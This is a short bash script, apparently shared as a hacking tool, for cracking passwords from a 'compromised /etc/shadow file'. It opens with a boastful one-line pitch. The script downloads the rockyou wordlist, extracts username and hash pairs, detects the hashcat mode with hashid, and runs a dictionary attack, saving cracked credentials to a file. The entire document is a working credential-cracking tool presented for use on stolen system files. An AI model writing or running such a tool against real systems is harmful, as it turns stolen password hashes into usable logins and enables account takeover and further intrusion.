Found an /etc/shadow file but don't feel like learning hashcat? Pwn it in no time with this 1337 $cr!p7

pwn-etc-shadow.sh

#!/bin/bash

if [[ $# -eq 0 ]]; then
	echo "Usage:"
	echo "Provide compromised /etc/shadow file as command line argument."
	echo "And make sure you have read permissions on it."
	echo "  e.g. $0 shadow.txt"
	exit 1
fi

main() { # $1 is compromised /etc/shadow file
	rockyouURL="https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt"
	
	wordlistFile="rockyou.txt"
	if [ -e "$wordlistFile" ]; then
	    echo "Found rockyou.txt"
	else
		echo "Downloading rockyou.txt"
	    curl -s -L "$rockyouURL" -o "$wordlistFile"
	fi

	# grep compromised /etc/shadow file for hashes
	hashLines=$(grep -P '^[^:]+:\$\d\w?\$[^:]+:.*$' "$1") # lines that contain hashes from compromised /etc/shadow file

	hashFile="hashes.txt"

	# scrub hash file
	truncate -s 0 "$hashFile"

	mode="1800" # default to standard Linux SHA-512 Crypt

	for line in $hashLines; do
		user=$(echo "$line" | cut -d':' -f1)
		hash=$(echo "$line" | cut -d':' -f2)
		echo "$user:$hash" >> "$hashFile"
		mode=$(hashid -m "$hash" | grep -oP '\[Hashcat Mode: \d+' | cut -c 16-)
	done

	# execute hashcat
	resultsFile="cracked.txt"

	# scrub results file
	truncate -s 0 "$resultsFile"

	# first run - crack everything ya can
	hashcat -m "$mode" -a 0 --username "$hashFile" "$wordlistFile" -O --force

	# second run - display any cracked results nicely
	hashcat -m "$mode" --show --username --outfile-format 3 --outfile "$resultsFile" "$hashFile"

	echo "Results written to $resultsFile"
}

main $*